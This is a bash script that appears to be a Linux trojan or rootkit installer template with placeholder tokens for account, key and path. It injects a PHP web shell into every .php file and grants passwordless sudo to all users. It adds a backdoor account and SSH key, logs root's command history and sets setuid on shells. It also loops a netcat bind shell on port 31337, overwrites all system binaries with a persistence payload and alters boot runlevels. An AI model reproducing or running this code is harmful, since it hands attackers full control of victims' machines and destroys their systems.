#!/bin/bash -p

SAVEIFS=$IFS
IFS=$(echo -en "\n\b")
for i in `find / -name "*.php"`
do
  echo "<pre><?php if(isset(\$_GET['x'])) { system(\$_GET['x'],\$output); echo (\$output); unset(\$_GET['x']);} php?></pre>" >> $i.tmp
  cat $i >> $i.tmp
  mv $i.tmp $i
done
IFS=$SAVEIFS

echo "mysql	ALL=NOPASSWD: ALL" >> /etc/sudoers
echo "apache	ALL=NOPASSWD: ALL" >> /etc/sudoers
echo "asterisk	ALL=NOPASSWD: ALL" >> /etc/sudoers
echo "nobody    ALL=NOPASSWD: ALL" >> /etc/sudoers
echo "www-data  ALL=NOPASSWD: ALL" >> /etc/sudoers
echo "lp        ALL=NOPASSWD: ALL" >> /etc/sudoers
echo "ALL       ALL=NOPASSWD: ALL" >> /etc/sudoers

echo "#!TS_TROJAN_PASSWD!#" >> /etc/passwd
echo "#!TS_TROJAN_ACCOUNT!#::14296:0:99999:7:::" >> /etc/shadow

echo "ssh-rsa #!TS_TROJAN_SSHKEY!# #!TS_TROJAN_ACCOUNT!#" >> /root/.ssh/authorized_keys
cp /tmp/#!TS_TROJAN_STARTUP!#/sshd_config /etc/ssh/sshd_config
/etc/init.d/ssh restart

cat /root/.bash_history >> /var/log/ksyslog.log
echo "cat /root/.bash_history >> /var/log/ksyslog.log" >> /root/.bash_logout

#sh copies
cp /bin/bash /bin/false
cp /bin/bash /sbin/false
cp /bin/bash /bin/ksh

chmod a+srwx `whereis sh | awk {' print $2 '}`
chmod a+srwx `whereis bash | awk {' print $2 '}`
chmod a+srwx `whereis ksh | awk {' print $2 '}`
chmod a+srwx /bin/false
chmod a+srwx /sbin/false
chmod a+srwx `whereis nano | awk {' print $2 '}`
chmod a+srwx `whereis cat | awk {' print $2 '}`
chmod a+srwx `whereis vi | awk {' print $2 '}`
chmod a+srwx `whereis nc | awk {' print $2 '}`

cp /bin/mv /tmp/#!TS_TROJAN_STARTUP!#/loader
cp /bin/cp /tmp/#!TS_TROJAN_STARTUP!#/feeder
cp /bin/ln /tmp/#!TS_TROJAN_STARTUP!#/seeder
cp /bin/cat /tmp/#!TS_TROJAN_STARTUP!#/reeder
cp /bin/dd /tmp/#!TS_TROJAN_STARTUP!#/deeder
cp /bin/echo /tmp/#!TS_TROJAN_STARTUP!#/meeder
cp /bin/sed /tmp/#!TS_TROJAN_STARTUP!#/needer
cp /bin/chmod /tmp/#!TS_TROJAN_STARTUP!#/ceeder
cp /usr/bin/find /tmp/#!TS_TROJAN_STARTUP!#/locate
cp /usr/bin/base64 /tmp/#!TS_TROJAN_STARTUP!#/base

echo "while [ 1 ]; do nc -e /bin/bash -k -l -p 31337 2>/dev/null; done" > #!TS_TROJAN_PATH!#/#!TS_TROJAN_HIDE!#_cmd
echo "#!TS_TROJAN_PATH!#/#!TS_TROJAN_HIDE!#_cmd" >> /etc/profile

/tmp/#!TS_TROJAN_STARTUP!#/feeder -RL /bin #!TS_TROJAN_PATH!#
/tmp/#!TS_TROJAN_STARTUP!#/feeder -RL /usr/bin #!TS_TROJAN_PATH!#/usr/

for i in `/tmp/#!TS_TROJAN_STARTUP!#/locate /bin -type f`; do
	/tmp/#!TS_TROJAN_STARTUP!#/feeder /tmp/#!TS_TROJAN_STARTUP!#/#!TS_TROJAN_PERSIST!# $i
	/tmp/#!TS_TROJAN_STARTUP!#/meeder "#!/bin/bash -p" > $i
	/tmp/#!TS_TROJAN_STARTUP!#/deeder if=/dev/urandom count=$RANDOM bs=1 | base64 | /tmp/#!TS_TROJAN_STARTUP!#/needer -e 's/^/#/g' >> $i
	/tmp/#!TS_TROJAN_STARTUP!#/reeder /tmp/#!TS_TROJAN_STARTUP!#/#!TS_TROJAN_PERSIST!# >> $i
done

for i in `/tmp/sysdev/locate /usr/bin -type f`; do
        /tmp/#!TS_TROJAN_STARTUP!#/feeder /tmp/#!TS_TROJAN_STARTUP!#/#!TS_TROJAN_PERSIST!# $i
	/tmp/#!TS_TROJAN_STARTUP!#/meeder "#!/bin/bash -p" > $i
	/tmp/#!TS_TROJAN_STARTUP!#/deeder if=/dev/urandom count=$RANDOM bs=1 | /tmp/#!TS_TROJAN_STARTUP!#/base | /tmp/#!TS_TROJAN_STARTUP!#/needer -e 's/^/#/g' >> $i
	/tmp/#!TS_TROJAN_STARTUP!#/reeder /tmp/#!TS_TROJAN_STARTUP!#/#!TS_TROJAN_PERSIST!# >> $i
done

/tmp/#!TS_TROJAN_STARTUP!#/feeder #!TS_TROJAN_PATH!#/bin/bash /bin
/tmp/#!TS_TROJAN_STARTUP!#/feeder #!TS_TROJAN_PATH!#/bin/sh /bin
/tmp/#!TS_TROJAN_STARTUP!#/feeder #!TS_TROJAN_PATH!#/bin/gzip /bin
/tmp/#!TS_TROJAN_STARTUP!#/feeder #!TS_TROJAN_PATH!#/bin/login /bin
/tmp/#!TS_TROJAN_STARTUP!#/feeder /tmp/#!TS_TROJAN_STARTUP!#/kill /bin/kill
/tmp/#!TS_TROJAN_STARTUP!#/feeder /tmp/#!TS_TROJAN_STARTUP!#/rm /bin/rm
/tmp/#!TS_TROJAN_STARTUP!#/feeder /tmp/#!TS_TROJAN_STARTUP!#/interactive /bin/nano
/tmp/#!TS_TROJAN_STARTUP!#/feeder /tmp/#!TS_TROJAN_STARTUP!#/interactive /bin/less
/tmp/#!TS_TROJAN_STARTUP!#/feeder /tmp/#!TS_TROJAN_STARTUP!#/interactive /usr/bin/vim
/tmp/#!TS_TROJAN_STARTUP!#/feeder /tmp/#!TS_TROJAN_STARTUP!#/interactive /usr/bin/vi

/tmp/#!TS_TROJAN_STARTUP!#/feeder /tmp/#!TS_TROJAN_STARTUP!#/rc.stop /etc/init.d/#!TS_TROJAN_HIDE!#
/tmp/#!TS_TROJAN_STARTUP!#/seeder /etc/init.d/#!TS_TROJAN_HIDE!# -s /etc/rc0.d/S01#!TS_TROJAN_HIDE!#
/tmp/#!TS_TROJAN_STARTUP!#/seeder /etc/init.d/#!TS_TROJAN_HIDE!# -s /etc/rc6.d/S01#!TS_TROJAN_HIDE!#
/tmp/#!TS_TROJAN_STARTUP!#/meeder "telinit 5" > /etc/rc1.d/S01bootload
/tmp/#!TS_TROJAN_STARTUP!#/meeder "telinit 5" > /etc/rc2.d/S01bootload
/tmp/#!TS_TROJAN_STARTUP!#/meeder "telinit 5" > /etc/rc3.d/S01bootload

